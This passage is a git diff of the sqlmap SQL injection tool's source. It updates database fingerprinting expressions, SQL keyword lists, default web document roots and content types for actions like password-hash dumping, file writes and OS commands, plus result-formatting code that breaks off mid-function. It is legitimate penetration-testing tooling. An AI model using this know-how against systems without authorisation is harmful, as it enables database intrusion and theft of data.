"python-pyodbc", "http://pyodbc.googlecode.com/"), - DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/"), - DBMS.MAXDB: (MAXDB_ALIASES, None, None), - DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/"), - DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/"), - } + DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "mssql+pymssql"), + DBMS.MYSQL: (MYSQL_ALIASES, "python-pymysql", "https://github.com/PyMySQL/PyMySQL", "mysql"), + DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), + DBMS.ORACLE: (ORACLE_ALIASES, "python-oracledb", "https://oracle.github.io/python-oracledb/", "oracle"), + DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "https://docs.python.org/3/library/sqlite3.html", "sqlite"), + DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "https://github.com/mkleehammer/pyodbc", "access"), + DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "https://kinterbasdb.sourceforge.net/", "firebird"), + DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), + DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "https://github.com/pymssql/pymssql", "sybase"), + DBMS.DB2: (DB2_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None), + DBMS.H2: (H2_ALIASES, None, None, None), + DBMS.INFORMIX: (INFORMIX_ALIASES, "python ibm-db", "https://github.com/ibmdb/python-ibmdb", "ibm_db_sa"), + DBMS.MONETDB: (MONETDB_ALIASES, "pymonetdb", "https://github.com/gijzelaerr/pymonetdb", "monetdb"), + DBMS.DERBY: (DERBY_ALIASES, "pydrda", "https://github.com/nakagami/pydrda/", None), + DBMS.VERTICA: (VERTICA_ALIASES, "vertica-python", "https://github.com/vertica/vertica-python", "vertica+vertica_python"), + DBMS.MCKOI: (MCKOI_ALIASES, None, None, None), + DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None), + DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None), + DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None), + DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None), + DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"), + DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None), + DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None), + DBMS.EXTREMEDB: (EXTREMEDB_ALIASES, None, None, None), + DBMS.FRONTBASE: (FRONTBASE_ALIASES, None, None, None), + DBMS.RAIMA: (RAIMA_ALIASES, None, None, None), + DBMS.VIRTUOSO: (VIRTUOSO_ALIASES, None, None, None), + DBMS.SNOWFLAKE: (SNOWFLAKE_ALIASES, None, None, "snowflake"), +} +# Reference: https://blog.jooq.org/tag/sysibm-sysdummy1/ FROM_DUMMY_TABLE = { - DBMS.ORACLE: " FROM DUAL", - DBMS.ACCESS: " FROM MSysAccessObjects", - DBMS.FIREBIRD: " FROM RDB$DATABASE", - DBMS.MAXDB: " FROM VERSIONS", - DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", - } + DBMS.ORACLE: " FROM DUAL", + DBMS.ACCESS: " FROM MSysAccessObjects", + DBMS.FIREBIRD: " FROM RDB$DATABASE", + DBMS.MAXDB: " FROM DUAL", + DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", + DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS", + 
DBMS.INFORMIX: " FROM SYSMASTER:SYSDUAL", + DBMS.DERBY: " FROM SYSIBM.SYSDUMMY1", + DBMS.MIMERSQL: " FROM SYSTEM.ONEROW", + DBMS.FRONTBASE: " FROM INFORMATION_SCHEMA.IO_STATISTICS" +} + +HEURISTIC_NULL_EVAL = { + DBMS.ACCESS: "CVAR(NULL)", + DBMS.MAXDB: "ALPHA(NULL)", + DBMS.MSSQL: "PARSENAME(NULL,NULL)", + DBMS.MYSQL: "IFNULL(QUARTER(NULL),NULL XOR NULL)", # NOTE: previous form (i.e., QUARTER(NULL XOR NULL)) was bad as some optimization engines wrongly evaluate QUARTER(NULL XOR NULL) to 0 + DBMS.ORACLE: "INSTR2(NULL,NULL)", + DBMS.PGSQL: "QUOTE_IDENT(NULL)", + DBMS.SQLITE: "JULIANDAY(NULL)", + DBMS.H2: "STRINGTOUTF8(NULL)", + DBMS.MONETDB: "CODE(NULL)", + DBMS.DERBY: "NULLIF(USER,SESSION_USER)", + DBMS.VERTICA: "BITSTRING_TO_BINARY(NULL)", + DBMS.MCKOI: "TONUMBER(NULL)", + DBMS.PRESTO: "FROM_HEX(NULL)", + DBMS.ALTIBASE: "TDESENCRYPT(NULL,NULL)", + DBMS.MIMERSQL: "ASCII_CHAR(256)", + DBMS.CRATEDB: "MD5(NULL~NULL)", # NOTE: NULL~NULL also being evaluated on H2 and Ignite + DBMS.CUBRID: "(NULL SETEQ NULL)", + DBMS.CACHE: "%SQLUPPER NULL", + DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))", + DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL)", + DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)", + DBMS.CLICKHOUSE: "halfMD5(NULL)", + DBMS.SNOWFLAKE: "BOOLNOT(NULL)", +} SQL_STATEMENTS = { - "SQL SELECT statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), - - "SQL data definition": ( - "create ", - "declare ", - "drop ", - "truncate ", - "alter ", ), - - "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), - - "SQL data control": ( - "grant ", - "revoke ", ), - - "SQL data execution": ( - "exec ", - "execute ", ), - - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), - } + "SQL SELECT statement": ( + "select ", + "show ", + " top ", + " distinct ", + " from ", + " from dual", + " where ", + " group by ", + " order by ", + " having ", + " limit ", + " offset ", + " union all ", + " rownum as ", + "(case ", + ), + + "SQL data definition": ( + "create ", + "declare ", + "drop ", + "truncate ", + "alter ", + ), + + "SQL data manipulation": ( + "bulk ", + "insert ", + "update ", + "delete ", + "merge ", + "copy ", + "load ", + ), + + "SQL data control": ( + "grant ", + "revoke ", + ), + + "SQL data execution": ( + "exec ", + "execute ", + "values ", + "call ", + ), + + "SQL transaction": ( + "start transaction ", + "begin work ", + "begin transaction ", + "commit ", + "rollback ", + ), + + "SQL administration": ( + "set ", + ), +} POST_HINT_CONTENT_TYPES = { - POST_HINT.JSON: "application/json", - POST_HINT.MULTIPART: "multipart/form-data", - POST_HINT.SOAP: "application/soap+xml", - POST_HINT.XML: "application/xml", - } + POST_HINT.JSON: "application/json", + POST_HINT.JSON_LIKE: "application/json", + POST_HINT.MULTIPART: "multipart/form-data", + POST_HINT.SOAP: "application/soap+xml", + POST_HINT.XML: "application/xml", + POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", +} + +OBSOLETE_OPTIONS = { + "--replicate": "use '--dump-format=SQLITE' instead", + "--no-unescape": "use '--no-escape' instead", + "--binary": "use '--binary-fields' instead", + "--auth-private": "use '--auth-file' instead", + "--ignore-401": "use '--ignore-code' instead", + "--second-order": "use '--second-url' instead", + 
"--purge-output": "use '--purge' instead", + "--sqlmap-shell": "use '--shell' instead", + "--check-payload": None, + "--check-waf": None, + "--pickled-options": "use '--api -c ...' instead", + "--identify-waf": "functionality being done automatically", +} DEPRECATED_OPTIONS = { - "--replicate": "use '--dump-format=SQLITE' instead", - "--no-unescape": "use '--no-escape' instead", - } +} DUMP_DATA_PREPROCESS = { - DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 - DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, - } + DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, + DBMS.MSSQL: { + "IMAGE": "CONVERT(VARBINARY(MAX),%s)", + "GEOMETRY": "(%s).STAsText()", + "GEOGRAPHY": "(%s).STAsText()" + }, + DBMS.PGSQL: { + "GEOMETRY": "ST_AsText(%s)", + "GEOGRAPHY": "ST_AsText(%s)" + }, + DBMS.MYSQL: { + "GEOMETRY": "ST_AsText(%s)" + } +} + +DEFAULT_DOC_ROOTS = { + OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"), + OS.LINUX: ("/var/www/", "/var/www/html", "/var/www/htdocs", "/usr/local/apache2/htdocs", "/usr/local/www/data", "/var/apache2/htdocs", "/var/www/nginx-default", "/srv/www/htdocs", "/usr/local/var/www", "/usr/share/nginx/html") +} + +PART_RUN_CONTENT_TYPES = { + "checkDbms": CONTENT_TYPE.TECHNIQUES, + "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT, + "getBanner": CONTENT_TYPE.BANNER, + "getCurrentUser": CONTENT_TYPE.CURRENT_USER, + "getCurrentDb": CONTENT_TYPE.CURRENT_DB, + "getHostname": CONTENT_TYPE.HOSTNAME, + "isDba": CONTENT_TYPE.IS_DBA, + "getUsers": CONTENT_TYPE.USERS, + "getPasswordHashes": CONTENT_TYPE.PASSWORDS, + "getPrivileges": CONTENT_TYPE.PRIVILEGES, + "getRoles": CONTENT_TYPE.ROLES, + "getDbs": CONTENT_TYPE.DBS, + "getTables": CONTENT_TYPE.TABLES, + "getColumns": CONTENT_TYPE.COLUMNS, + "getSchema": CONTENT_TYPE.SCHEMA, + "getCount": CONTENT_TYPE.COUNT, + "dumpTable": CONTENT_TYPE.DUMP_TABLE, + "search": CONTENT_TYPE.SEARCH, + "sqlQuery": CONTENT_TYPE.SQL_QUERY, + "tableExists": CONTENT_TYPE.COMMON_TABLES, + "columnExists": CONTENT_TYPE.COMMON_COLUMNS, + "readFile": CONTENT_TYPE.FILE_READ, + "writeFile": CONTENT_TYPE.FILE_WRITE, + "osCmd": CONTENT_TYPE.OS_CMD, + "regRead": CONTENT_TYPE.REG_READ +} + +# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html + +HTML_ENTITIES = { + "quot": 34, + "amp": 38, + "apos": 39, + "lt": 60, + "gt": 62, + "nbsp": 160, + "iexcl": 161, + "cent": 162, + "pound": 163, + "curren": 164, + "yen": 165, + "brvbar": 166, + "sect": 167, + "uml": 168, + "copy": 169, + "ordf": 170, + "laquo": 171, + "not": 172, + "shy": 173, + "reg": 174, + "macr": 175, + "deg": 176, + "plusmn": 177, + "sup2": 178, + "sup3": 179, + "acute": 180, + "micro": 181, + "para": 182, + "middot": 183, + "cedil": 184, + "sup1": 185, + "ordm": 186, + "raquo": 187, + "frac14": 188, + "frac12": 189, + "frac34": 190, + "iquest": 191, + "Agrave": 192, + "Aacute": 193, + "Acirc": 194, + "Atilde": 195, + "Auml": 196, + "Aring": 197, + "AElig": 198, + "Ccedil": 199, + "Egrave": 200, + "Eacute": 201, + "Ecirc": 202, + "Euml": 203, + "Igrave": 204, + "Iacute": 205, + "Icirc": 206, + "Iuml": 207, + "ETH": 208, + "Ntilde": 209, + "Ograve": 210, + "Oacute": 211, + "Ocirc": 212, + "Otilde": 213, + "Ouml": 214, + "times": 215, + "Oslash": 216, + "Ugrave": 217, + "Uacute": 218, + "Ucirc": 219, + "Uuml": 220, + "Yacute": 221, + "THORN": 222, + "szlig": 223, + "agrave": 224, + "aacute": 225, + "acirc": 226, + "atilde": 227, + "auml": 228, + "aring": 229, + "aelig": 230, + "ccedil": 231, + 
"egrave": 232, + "eacute": 233, + "ecirc": 234, + "euml": 235, + "igrave": 236, + "iacute": 237, + "icirc": 238, + "iuml": 239, + "eth": 240, + "ntilde": 241, + "ograve": 242, + "oacute": 243, + "ocirc": 244, + "otilde": 245, + "ouml": 246, + "divide": 247, + "oslash": 248, + "ugrave": 249, + "uacute": 250, + "ucirc": 251, + "uuml": 252, + "yacute": 253, + "thorn": 254, + "yuml": 255, + "OElig": 338, + "oelig": 339, + "Scaron": 352, + "fnof": 402, + "scaron": 353, + "Yuml": 376, + "circ": 710, + "tilde": 732, + "Alpha": 913, + "Beta": 914, + "Gamma": 915, + "Delta": 916, + "Epsilon": 917, + "Zeta": 918, + "Eta": 919, + "Theta": 920, + "Iota": 921, + "Kappa": 922, + "Lambda": 923, + "Mu": 924, + "Nu": 925, + "Xi": 926, + "Omicron": 927, + "Pi": 928, + "Rho": 929, + "Sigma": 931, + "Tau": 932, + "Upsilon": 933, + "Phi": 934, + "Chi": 935, + "Psi": 936, + "Omega": 937, + "alpha": 945, + "beta": 946, + "gamma": 947, + "delta": 948, + "epsilon": 949, + "zeta": 950, + "eta": 951, + "theta": 952, + "iota": 953, + "kappa": 954, + "lambda": 955, + "mu": 956, + "nu": 957, + "xi": 958, + "omicron": 959, + "pi": 960, + "rho": 961, + "sigmaf": 962, + "sigma": 963, + "tau": 964, + "upsilon": 965, + "phi": 966, + "chi": 967, + "psi": 968, + "omega": 969, + "thetasym": 977, + "upsih": 978, + "piv": 982, + "bull": 8226, + "hellip": 8230, + "prime": 8242, + "Prime": 8243, + "oline": 8254, + "frasl": 8260, + "ensp": 8194, + "emsp": 8195, + "thinsp": 8201, + "zwnj": 8204, + "zwj": 8205, + "lrm": 8206, + "rlm": 8207, + "ndash": 8211, + "mdash": 8212, + "lsquo": 8216, + "rsquo": 8217, + "sbquo": 8218, + "ldquo": 8220, + "rdquo": 8221, + "bdquo": 8222, + "dagger": 8224, + "Dagger": 8225, + "permil": 8240, + "lsaquo": 8249, + "rsaquo": 8250, + "euro": 8364, + "weierp": 8472, + "image": 8465, + "real": 8476, + "trade": 8482, + "alefsym": 8501, + "larr": 8592, + "uarr": 8593, + "rarr": 8594, + "darr": 8595, + "harr": 8596, + "crarr": 8629, + "lArr": 8656, + "uArr": 8657, + "rArr": 8658, + "dArr": 8659, + "hArr": 8660, + "forall": 8704, + "part": 8706, + "exist": 8707, + "empty": 8709, + "nabla": 8711, + "isin": 8712, + "notin": 8713, + "ni": 8715, + "prod": 8719, + "sum": 8721, + "minus": 8722, + "lowast": 8727, + "radic": 8730, + "prop": 8733, + "infin": 8734, + "ang": 8736, + "and": 8743, + "or": 8744, + "cap": 8745, + "cup": 8746, + "int": 8747, + "there4": 8756, + "sim": 8764, + "cong": 8773, + "asymp": 8776, + "ne": 8800, + "equiv": 8801, + "le": 8804, + "ge": 8805, + "sub": 8834, + "sup": 8835, + "nsub": 8836, + "sube": 8838, + "supe": 8839, + "oplus": 8853, + "otimes": 8855, + "perp": 8869, + "sdot": 8901, + "lceil": 8968, + "rceil": 8969, + "lfloor": 8970, + "rfloor": 8971, + "lang": 9001, + "rang": 9002, + "loz": 9674, + "spades": 9824, + "clubs": 9827, + "hearts": 9829, + "diams": 9830 +} diff --git a/lib/core/dump.py b/lib/core/dump.py index f2e7c93182d..aa50ae07c4c 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -1,52 +1,69 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs +import hashlib import os +import re +import shutil +import tempfile import threading -from xml.dom.minidom import getDOMImplementation - from lib.core.common import Backend +from lib.core.common import checkFile from lib.core.common import dataToDumpFile from lib.core.common import dataToStdout -from 
lib.core.common import getUnicode +from lib.core.common import filterNone +from lib.core.common import getSafeExString from lib.core.common import isListLike +from lib.core.common import isNoneValue from lib.core.common import normalizeUnicode from lib.core.common import openFile from lib.core.common import prioritySortColumns from lib.core.common import randomInt from lib.core.common import safeCSValue +from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.compat import xrange +from lib.core.convert import getBytes +from lib.core.convert import getConsoleLength +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.convert import htmlEscape from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import API_CONTENT_STATUS -from lib.core.enums import API_CONTENT_TYPE +from lib.core.enums import CONTENT_STATUS +from lib.core.enums import CONTENT_TYPE from lib.core.enums import DBMS from lib.core.enums import DUMP_FORMAT from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapValueException from lib.core.replication import Replication +from lib.core.settings import CHECK_SQLITE_TYPE_THRESHOLD +from lib.core.settings import DUMP_FILE_BUFFER_SIZE from lib.core.settings import HTML_DUMP_CSS_STYLE +from lib.core.settings import IS_WIN from lib.core.settings import METADB_SUFFIX from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import UNICODE_ENCODING +from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT +from lib.core.settings import VERSION_STRING +from lib.core.settings import WINDOWS_RESERVED_NAMES +from lib.utils.safe2bin import safechardecode +from thirdparty import six from thirdparty.magic import magic -from extra.safe2bin.safe2bin import safechardecode - class Dump(object): """ This class defines methods used to parse and output the results of SQL injection actions - """ def __init__(self): @@ -55,79 +72,95 @@ def __init__(self): self._lock = threading.Lock() def _write(self, data, newline=True, console=True, content_type=None): - if hasattr(conf, "api"): - dataToStdout(data, content_type=content_type, status=API_CONTENT_STATUS.COMPLETE) - return - text = "%s%s" % (data, "\n" if newline else " ") - if console: + if conf.api: + dataToStdout(data, contentType=content_type, status=CONTENT_STATUS.COMPLETE) + + elif console: dataToStdout(text) - if kb.get("multiThreadMode"): - self._lock.acquire() + if self._outputFP: + multiThreadMode = kb.multiThreadMode + if multiThreadMode: + self._lock.acquire() - self._outputFP.write(text) + try: + self._outputFP.write(text) + except IOError as ex: + errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) + raise SqlmapGenericException(errMsg) - if kb.get("multiThreadMode"): - self._lock.release() + if multiThreadMode: + self._lock.release() kb.dataOutputFlag = True + def flush(self): + if self._outputFP: + try: + self._outputFP.flush() + except IOError: + pass + def setOutputFile(self): - self._outputFile = "%s%slog" % (conf.outputPath, os.sep) + if conf.noLogging: + self._outputFP = None + return + + self._outputFile = os.path.join(conf.outputPath, "log") try: - self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", 
UNICODE_ENCODING) - except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % ex + self._outputFP = openFile(self._outputFile, 'a' if not conf.flushSession else 'w') + except IOError as ex: + errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) - def getOutputFile(self): - return self._outputFile - - def singleString(self, data): - self._write(data) + def singleString(self, data, content_type=None): + self._write(data, content_type=content_type) def string(self, header, data, content_type=None, sort=True): - kb.stickyLevel = None + if conf.api: + self._write(data, content_type=content_type) + + if isListLike(data) and len(data) == 1: + data = unArrayizeValue(data) if isListLike(data): - self.lister(header, data, sort) + self.lister(header, data, content_type, sort) elif data is not None: _ = getUnicode(data) - if _ and _[-1] == '\n': + if _.endswith("\r\n"): + _ = _[:-2] + + elif _.endswith("\n"): _ = _[:-1] - if hasattr(conf, "api"): - self._write(data, content_type=content_type) - elif "\n" in _: + if _.strip(' '): + _ = _.strip(' ') + + if "\n" in _: self._write("%s:\n---\n%s\n---" % (header, _)) else: - self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, basestring) else _)) - elif hasattr(conf, "api"): - self._write(data, content_type=content_type) - else: - self._write("%s:\tNone" % header) + self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, six.string_types) else _)) def lister(self, header, elements, content_type=None, sort=True): if elements and sort: try: elements = set(elements) elements = list(elements) - elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + elements.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) except: pass - if hasattr(conf, "api"): + if conf.api: self._write(elements, content_type=content_type) - return if elements: self._write("%s [%d]:" % (header, len(elements))) for element in elements: - if isinstance(element, basestring): + if isinstance(element, six.string_types): self._write("[*] %s" % element) elif isListLike(element): self._write("[*] " + ", ".join(getUnicode(e) for e in element)) @@ -136,45 +169,51 @@ def lister(self, header, elements, content_type=None, sort=True): self._write("") def banner(self, data): - self.string("banner", data, content_type=API_CONTENT_TYPE.BANNER) + self.string("banner", data, content_type=CONTENT_TYPE.BANNER) def currentUser(self, data): - self.string("current user", data, content_type=API_CONTENT_TYPE.CURRENT_USER) + self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER) def currentDb(self, data): - if Backend.isDbms(DBMS.MAXDB): - self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=API_CONTENT_TYPE.CURRENT_DB) - elif Backend.isDbms(DBMS.ORACLE): - self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=API_CONTENT_TYPE.CURRENT_DB) + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.VERTICA, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE): + self.string("current database (equivalent to schema on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.DB2, DBMS.MIMERSQL, DBMS.MAXDB, DBMS.VIRTUOSO): + self.string("current database (equivalent to owner on %s)" % Backend.getIdentifiedDbms(), data, 
content_type=CONTENT_TYPE.CURRENT_DB) else: - self.string("current database", data, content_type=API_CONTENT_TYPE.CURRENT_DB) + self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) def hostname(self, data): - self.string("hostname", data, content_type=API_CONTENT_TYPE.HOSTNAME) + self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME) def dba(self, data): - self.string("current user is DBA", data, content_type=API_CONTENT_TYPE.IS_DBA) + self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA) def users(self, users): - self.lister("database management system users", users, content_type=API_CONTENT_TYPE.USERS) + self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS) + + def statements(self, statements): + self.lister("SQL statements", statements, content_type=CONTENT_TYPE.STATEMENTS) def userSettings(self, header, userSettings, subHeader, content_type=None): self._areAdmins = set() - if userSettings: - self._write("%s:" % header) - if isinstance(userSettings, (tuple, list, set)): self._areAdmins = userSettings[1] userSettings = userSettings[0] - users = userSettings.keys() - users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + users = [_ for _ in userSettings.keys() if _ is not None] + users.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) + + if conf.api: + self._write(userSettings, content_type=content_type) + + if userSettings: + self._write("%s:" % header) for user in users: - settings = userSettings[user] + settings = filterNone(userSettings[user]) - if settings is None: + if isNoneValue(settings): stringSettings = "" else: stringSettings = " [%d]:" % len(settings) @@ -194,10 +233,13 @@ def userSettings(self, header, userSettings, subHeader, content_type=None): self.singleString("") def dbs(self, dbs): - self.lister("available databases", dbs, content_type=API_CONTENT_TYPE.DBS) + self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS) - def dbTables(self, dbTables, content_type=API_CONTENT_TYPE.TABLES): + def dbTables(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: + if conf.api: + self._write(dbTables, content_type=CONTENT_TYPE.TABLES) + maxlength = 0 for tables in dbTables.values(): @@ -205,14 +247,14 @@ def dbTables(self, dbTables, content_type=API_CONTENT_TYPE.TABLES): if table and isListLike(table): table = table[0] - maxlength = max(maxlength, len(normalizeUnicode(table) or str(table))) + maxlength = max(maxlength, getConsoleLength(unsafeSQLIdentificatorNaming(getUnicode(table)))) lines = "-" * (int(maxlength) + 2) for db, tables in dbTables.items(): - tables.sort() + tables = sorted(filter(None, tables)) - self._write("Database: %s" % db if db else "Current database") + self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "") if len(tables) == 1: self._write("[1 table]") @@ -225,17 +267,21 @@ def dbTables(self, dbTables, content_type=API_CONTENT_TYPE.TABLES): if table and isListLike(table): table = table[0] - blank = " " * (maxlength - len(normalizeUnicode(table) or str(table))) + table = unsafeSQLIdentificatorNaming(table) + blank = " " * (maxlength - getConsoleLength(getUnicode(table))) self._write("| %s%s |" % (table, blank)) self._write("+%s+\n" % lines) elif dbTables is None or len(dbTables) == 0: - self.singleString("No tables found") + self.singleString("No tables found", content_type=CONTENT_TYPE.TABLES) else: - self.string("tables", dbTables) + self.string("tables", 
dbTables, content_type=CONTENT_TYPE.TABLES) - def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): + def dbTableColumns(self, tableColumns, content_type=None): if isinstance(tableColumns, dict) and len(tableColumns) > 0: + if conf.api: + self._write(tableColumns, content_type=content_type) + for db, tables in tableColumns.items(): if not db: db = "All" @@ -246,12 +292,13 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): colType = None - colList = columns.keys() - colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + colList = list(columns.keys()) + colList.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) for column in colList: colType = columns[column] + column = unsafeSQLIdentificatorNaming(column) maxlength1 = max(maxlength1, len(column or "")) maxlength2 = max(maxlength2, len(colType or "")) @@ -262,7 +309,7 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): maxlength2 = max(maxlength2, len("TYPE")) lines2 = "-" * (maxlength2 + 2) - self._write("Database: %s\nTable: %s" % (db if db else "Current database", table)) + self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "", unsafeSQLIdentificatorNaming(table))) if len(columns) == 1: self._write("[1 column]") @@ -288,6 +335,8 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): for column in colList: colType = columns[column] + + column = unsafeSQLIdentificatorNaming(column) blank1 = " " * (maxlength1 - len(column)) if colType is not None: @@ -301,18 +350,21 @@ def dbTableColumns(self, tableColumns, content_type=API_CONTENT_TYPE.COLUMNS): else: self._write("+%s+\n" % lines1) - def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): + def dbTablesCount(self, dbTables): if isinstance(dbTables, dict) and len(dbTables) > 0: + if conf.api: + self._write(dbTables, content_type=CONTENT_TYPE.COUNT) + maxlength1 = len("Table") maxlength2 = len("Entries") for ctables in dbTables.values(): for tables in ctables.values(): for table in tables: - maxlength1 = max(maxlength1, len(normalizeUnicode(table) or str(table))) + maxlength1 = max(maxlength1, getConsoleLength(getUnicode(table))) for db, counts in dbTables.items(): - self._write("Database: %s" % db if db else "Current database") + self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db and METADB_SUFFIX not in db else "") lines1 = "-" * (maxlength1 + 2) blank1 = " " * (maxlength1 - len("Table")) @@ -323,7 +375,7 @@ def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): self._write("| Table%s | Entries%s |" % (blank1, blank2)) self._write("+%s+%s+" % (lines1, lines2)) - sortedCounts = counts.keys() + sortedCounts = list(counts.keys()) sortedCounts.sort(reverse=True) for count in sortedCounts: @@ -332,10 +384,10 @@ def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): if count is None: count = "Unknown" - tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) + tables.sort(key=lambda _: _.lower() if hasattr(_, "lower") else _) for table in tables: - blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or str(table))) + blank1 = " " * (maxlength1 - getConsoleLength(getUnicode(table))) blank2 = " " * (maxlength2 - len(str(count))) self._write("| %s%s | %d%s |" % (table, blank1, count, blank2)) @@ -343,10 +395,12 @@ def dbTablesCount(self, dbTables, content_type=API_CONTENT_TYPE.COUNT): else: logger.error("unable 
to retrieve the number of entries for any table") - def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): + def dbTableValues(self, tableValues): replication = None rtable = None dumpFP = None + appendToFile = False + warnFile = False if tableValues is None: return @@ -356,23 +410,95 @@ def dbTableValues(self, tableValues, content_type=API_CONTENT_TYPE.DUMP_TABLE): db = "All" table = tableValues["__infos__"]["table"] + if conf.api: + self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE) + + try: + dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db)) + except UnicodeError: + try: + dumpDbPath = os.path.join(conf.dumpPath, normalizeUnicode(unsafeSQLIdentificatorNaming(db))) + except (UnicodeError, OSError): + tempDir = tempfile.mkdtemp(prefix="sqlmapdb") + warnMsg = "currently unable to use regular dump directory. " + warnMsg += "Using temporary directory '%s' instead" % tempDir + 